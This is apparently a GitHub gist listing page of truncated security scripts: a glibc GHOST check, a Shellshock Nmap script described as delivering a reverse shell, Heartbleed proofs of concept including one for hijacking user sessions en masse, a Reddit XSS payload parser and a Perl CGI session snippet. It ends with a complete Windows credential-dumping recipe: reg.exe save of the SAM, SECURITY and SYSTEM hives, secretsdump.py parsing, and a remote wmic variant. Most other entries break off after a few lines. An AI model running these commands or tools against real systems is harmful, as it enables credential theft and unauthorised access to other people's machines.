sh1n0b1 / CVE-2015-0235.c
Created January 28, 2015 06:34
CVE-2015-0235
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
var obj = document.getElementById(c_id);
if (obj.style.visibility == 'hidden') {
obj.style.visibility = 'visible';
obj.style.position = 'static';
} else {
#!/bin/python
import sys
import socket
import time
import struct
if len(sys.argv)<2:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
sh1n0b1 / http-vuln-cve-2014-6271.nse
Created October 6, 2014 09:15
NSE script for Shellshock vulnerability, CVE-2014-6271
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d
#!/usr/bin/perl -w
use CGI;
use Digest::MD5 qw(md5_hex);
# Request object; every read below goes through it.
$cgi = new CGI;
# Directory prefix for session files. /tmp/ is normally world-writable, so a
# file found under it is not trustworthy just because it exists.
$SESSDIR = "/tmp/";
# The session file name is taken directly from the client's "diagsess" cookie.
# NOTE(review): the rest of the script is not shown here. If this value is
# joined to $SESSDIR and opened, it needs strict validation (fixed-length hex
# only, no "/" or "..") before use -- confirm against the full file.
$sessfile = $cgi->cookie("diagsess");
# Request parameters "arg" and "action" are client-controlled as well.
# NOTE(review): confirm both are validated before they reach any file or
# command operation.
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");
sh1n0b1 / a04c152139d85507cac88fcc4aaf9ca9
Last active August 29, 2015 14:05
a04c152139d85507cac88fcc4aaf9ca9
# Sets two entries of %sesshash: an IP address under 'ip' and a user name under 'user'.
# NOTE(review): presumably the body of a session file; the code that loads it
# is not visible here -- confirm how these fields are checked.
$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';
sh1n0b1 / reddit.py
Created June 12, 2014 04:40
Python Script to parse XSS payload from reddit by Peter Kim
#!/usr/bin/env python
#Reddit XSS
#Author: Cheetz
import urllib2, sys
import logging, os, re, sys, urllib, string
from optparse import OptionParser
from urlparse import urlparse
class Lookup:
def run(self,url):
sh1n0b1 / heartbleed-altered.py
Created April 9, 2014 09:44
Using Heartbleed PoC for Hijacking User Sessions En Masse
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/
sh1n0b1 / ssltest.py
Created April 8, 2014 07:53
Python Heartbleed (CVE-2014-0160) Proof of Concept
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
sh1n0b1 / hashdump.reg
Last active December 8, 2023 21:53
Windows local Hash Dump
# Save the SAM, SECURITY and SYSTEM registry hives to files under c:\temp.
# The saved copies hold the same credential material as the live hives, so
# they are equally sensitive wherever they end up.
# Detection: "reg.exe save" against hklm\sam or hklm\security appears in
# process command-line logging and is a common hunting rule for credential dumping.
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
# Parse the three saved hives offline; LOCAL tells secretsdump.py to read the
# files instead of connecting to a remote target.
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
# Remote variant: start the same "reg save" on another host through WMI process creation.
# The account password is passed on the wmic command line, where process
# auditing and shell history can record it in clear text.
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"